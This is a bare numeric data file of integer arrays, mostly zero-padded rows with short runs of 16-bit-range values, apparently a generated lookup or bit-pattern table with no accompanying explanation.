[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 46212, 2881, 30950, 1542, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 28160, 19328, 50912, 26527],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 7044, 8769, 58854, 33542, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 27904, 58176, 11984, 59956, 621, 20558],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 33412, 14657, 21222, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 15872, 49024, 54240, 33784, 49726, 36969],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 59780, 20545, 49126, 32006, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 41728, 24768, 49712, 39436, 29859, 12128],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 20612, 26433, 11494, 64006, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 33472, 38576, 23084, 34147],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 46980, 32321, 39398, 30470, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 43264, 21056, 37520, 16676, 681, 14946],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 7812, 38209, 1766, 62470, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 10752, 39552, 29344, 16808, 52778, 61709],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 34180, 44097, 29670, 28934, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 65280, 6080, 63472, 62844, 49663, 3540],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 60548, 49985, 57574, 60934, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 11776, 56192, 53984, 16824, 51687],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 21380, 55873, 19942, 27398, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 9472, 4416, 35408, 40212, 31781, 33334],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 47748, 61761, 47846, 59398, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 22016, 1408, 13664, 43096, 40022, 62065],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 8580, 2113, 10214, 25862, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 39680, 40640, 8624, 28140, 3739, 52232],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 34948, 8001, 38118, 57862, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 14400, 45072, 27012, 55595],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 61316, 13889, 486, 24326, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 57600, 8256, 54800, 28164, 51937, 39882],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 22148, 19777, 28390, 56326, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 49664, 128, 56352, 59400, 47298, 6293],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 48516, 25665, 56294, 22790, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 30464, 62912, 65392, 62300, 54903, 15868],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 9348, 31553, 18662, 54790, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 22784, 56896, 64912, 5935],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 35716, 37441, 46566, 21254, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 56576, 32576, 13776, 9204, 35549, 47902],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 62084, 43329, 8934, 53254, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 28160, 35712, 9952, 12472, 61294, 42873],
